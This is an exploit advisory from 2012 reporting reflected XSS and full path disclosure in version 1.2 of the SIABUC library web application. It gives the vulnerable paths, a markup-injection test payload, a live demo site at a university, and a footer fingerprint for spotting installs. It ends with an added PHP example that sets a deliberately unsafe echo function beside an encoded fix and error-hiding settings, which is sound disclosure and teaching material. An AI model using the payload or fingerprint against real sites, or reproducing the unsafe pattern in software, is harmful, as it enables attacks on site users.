# Author: Mazt0r
# Exploit Title: XSS & Full Path Disclosure SIABUC
# Date: 24/02/2012
# software: SIABUC
# link: http://siabuc.ucol.mx/
# Version: 1.2 [other versions NOT TESTED]
# Category: webapps Library
# Tested on: Linux
Demo: http://www.cidcacs.iis.ucr.ac.cr/
----------------
Vulnerable
----------------
/reservacion/index.php
/reservacion/include/buscar.php
Exploit:
======================
Request: POST to http://localhost/reservacion/index.php with the XSS payload in the search form
Reflected in: /reservacion/include/buscar.php (input is written back into the page unescaped)
======================
Example:
======================
|---------------------|
|" > < h1 > A < / h1 >|
|---------------------|
- Result (XSS): the injected markup is rendered by the browser (the heading appears on the results page).
- Result (FPD): Notice: Trying to get property of non-object in C:\ABCSIS\Reservacion\include\buscarws.php on line ***
Footer fingerprint (site footer, as displayed): "© Derechos reservados 2010, Universidad de Colima. Página desarrollada por el departamento de SIABUC"
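The two findings above come from one common PHP pattern: a search term echoed back into HTML without encoding, and a PHP notice (property access on a null result) printed to the client with the script's absolute path. The snippet below is an added illustration written for this advisory, not SIABUC's own code; the parameter name "busqueda", the record object and its "titulo" property are hypothetical. It shows the vulnerable rendering next to the hardened one and the configuration that keeps notices out of the response.

```php
<?php
// Added illustrative example, not SIABUC's code. The parameter name
// "busqueda" and the record object are hypothetical.
declare(strict_types=1);

// --- Vulnerable pattern (reflected XSS) ---
function renderUnsafe(array $post): string {
    // Untrusted input is written straight into an HTML attribute. A value
    // such as "><h1>A</h1> closes the attribute and injects markup.
    $term = (string)($post['busqueda'] ?? '');
    return '<input type="text" name="busqueda" value="' . $term . '">';
}

// --- Hardened pattern ---
function renderSafe(array $post): string {
    $term = (string)($post['busqueda'] ?? '');
    // Entity-encode for the HTML attribute context. ENT_QUOTES also encodes
    // single and double quotes, so the attribute cannot be closed early.
    $safe = htmlspecialchars($term, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="busqueda" value="' . $safe . '">';
}

// --- Full path disclosure ---
// Accessing a property of a null lookup result raises "Trying to get
// property of non-object"; with display_errors on, PHP prints the notice
// (including the absolute script path) into the page. Check the result
// first, and keep notices out of the response regardless.
function lookupTitle(?object $record): string {
    return $record === null ? '' : (string)$record->titulo;
}

// Production error handling: log notices, never render them to the client.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
error_reporting(E_ALL);

// Self-check with a constructed payload (the marker used in the advisory).
$payload = ['busqueda' => '"><h1>A</h1>'];
echo "unsafe: " . renderUnsafe($payload) . "\n";   // markup survives intact
echo "safe:   " . renderSafe($payload) . "\n";     // markup is entity-encoded
echo "title:  [" . lookupTitle(null) . "]\n";      // no notice, empty string
```

Run with `php example.php` (PHP 7.1 or later for the nullable `?object` type). The `display_errors` setting should also be enforced in php.ini or the server configuration, since a per-script `ini_set` runs too late to cover errors raised during compilation.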
----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------